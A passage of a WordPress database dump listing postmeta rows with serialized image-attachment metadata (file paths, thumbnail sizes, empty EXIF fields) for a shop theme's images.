\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-233x300.jpg\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"our-history-right-img-796x1024.jpg\";s:5:\"width\";i:796;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-768x988.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:988;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-862x650.jpg\";s:5:\"width\";i:862;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:34:\"our-history-right-img-650x1109.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1109;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"our-history-right-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-600x772.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:772;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-600x772.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:772;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"our-history-right-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51385,41,'_wp_attachment_image_alt','x'),(51386,4264,'_wp_attachment_image_alt','c'),(51387,4266,'_wp_attachment_image_alt','m'),(51388,4263,'_wp_attachment_image_alt','m'),(51389,42,'_wp_attached_file','2018/07/shop-img-5.jpg'),(51390,42,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-5.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-5-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-5-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-5-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-5-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-5-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-5-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-5-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51391,4268,'_wp_attached_file','2018/07/shop-img-16.jpg'),(51392,4268,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-16.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-16-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-16-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-16-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-16-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-16-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-16-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-16-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-16-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-16-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51393,156,'_wp_attached_file','2018/07/h1-img-6.jpg'),(51394,156,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:1224;s:4:\"file\";s:20:\"2018/07/h1-img-6.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h1-img-6-196x300.jpg\";s:5:\"width\";i:196;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h1-img-6-669x1024.jpg\";s:5:\"width\";i:669;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h1-img-6-768x1175.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1175;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h1-img-6-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h1-img-6-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h1-img-6-650x1224.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1224;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h1-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h1-img-6-600x918.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:918;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h1-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h1-img-6-600x918.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:918;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51395,4267,'_wp_attachment_image_alt','f'),(51396,4269,'_wp_attached_file','2018/08/h8-img-1.jpg'),(51397,4269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:875;s:6:\"height\";i:945;s:4:\"file\";s:20:\"2018/08/h8-img-1.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h8-img-1-278x300.jpg\";s:5:\"width\";i:278;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h8-img-1-768x829.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:829;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h8-img-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h8-img-1-875x650.jpg\";s:5:\"width\";i:875;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:20:\"h8-img-1-650x945.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:945;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h8-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h8-img-1-600x648.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:648;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h8-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h8-img-1-600x648.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:648;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51398,4265,'_wp_attachment_image_alt','g'),(51399,4270,'_wp_attached_file','2018/08/our-history-left-img.jpg'),(51400,4270,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:739;s:6:\"height\";i:346;s:4:\"file\";s:32:\"2018/08/our-history-left-img.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-650x346.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-650x346.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"our-history-left-img-300x346.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-600x281.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-300x346.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-600x281.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"our-history-left-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51401,42,'_wp_attachment_image_alt','f'),(51402,4268,'_wp_attachment_image_alt','s'),(51403,4270,'_wp_attachment_image_alt','c'),(51404,4269,'_wp_attachment_image_alt','m'),(51405,156,'_wp_attachment_image_alt','m'),(51406,4271,'_wp_attached_file','2018/07/shop-img-17.jpg'),(51407,4271,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-17.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-17-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-17-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-17-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-17-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-17-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-17-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-17-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-17-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-17-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51408,4272,'_wp_attached_file','2018/08/shop-img-13.jpg'),(51409,4272,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/08/shop-img-13.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-13-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-13-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-13-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-13-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-13-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-13-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-13-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-13-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-13-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51410,4273,'_wp_attached_file','2018/07/shop-img-6.jpg'),(51411,4273,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-6.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-6-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-6-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-6-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-6-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-6-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-6-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-6-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";